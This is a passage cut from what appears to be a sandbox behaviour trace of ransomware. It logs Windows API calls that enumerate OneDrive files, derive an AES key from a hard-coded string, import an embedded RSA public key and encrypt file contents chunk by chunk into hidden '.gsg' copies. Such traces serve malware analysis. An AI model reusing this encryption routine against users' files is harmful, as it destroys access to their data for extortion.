lpFindFileData=0x2b9e2f0) returned 1 [0281.560] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0281.560] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mt-mt\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0281.560] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.560] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0281.560] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0281.560] GetLastError () returned 0x0 [0281.560] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mt-mt\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mt-mt\\filesync.localizedresources.dll.mui")) returned 0x20 [0281.561] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mt-mt\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0281.561] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mt-mt\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mt-mt\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d80 [0281.562] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mt-mt\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mt-mt\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0281.563] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mt-mt\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0281.564] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1ec40) returned 1 [0281.566] CryptCreateHash (in: hProv=0x2f1ec40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0281.566] lstrlenA (lpString="OJqEEUaHrEmqTOCUsZRXkTNKzMlQm") returned 29 [0281.566] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0281.566] CryptDeriveKey (in: hProv=0x2f1ec40, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc5c8) returned 1 [0281.566] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0281.567] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0281.567] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1eee8) returned 1 [0281.567] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1eee8, dwCertEncodingType=0x1, pInfo=0x2f37980*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f379b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f379b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc848) returned 1 [0281.567] CryptEncrypt (in: hKey=0x2fc848, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0281.567] CryptEncrypt (in: hKey=0x2fc848, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1ecc8*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1ecc8*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0281.567] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f1ecc8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1ecc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0281.568] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.584] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.584] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.588] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.588] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.588] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.588] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.588] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.588] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.588] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.589] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.589] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.589] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.601] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.601] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.602] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.602] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.602] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.602] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.602] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.602] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.602] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.602] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.602] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.602] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.603] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.603] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.603] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.603] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.603] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.603] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.603] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.603] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.603] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.603] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.603] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.603] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.603] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.603] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.604] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.604] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.604] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.604] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.604] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.604] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.604] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.604] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.604] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.604] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.604] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.604] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.605] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.605] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.605] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.605] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.605] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.605] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.605] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.605] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.605] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.605] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.605] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.605] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.606] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.606] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.606] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.606] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.606] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.606] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.606] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.606] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.606] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.606] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.606] CryptEncrypt (in: hKey=0x2fc5c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.606] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.606] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, 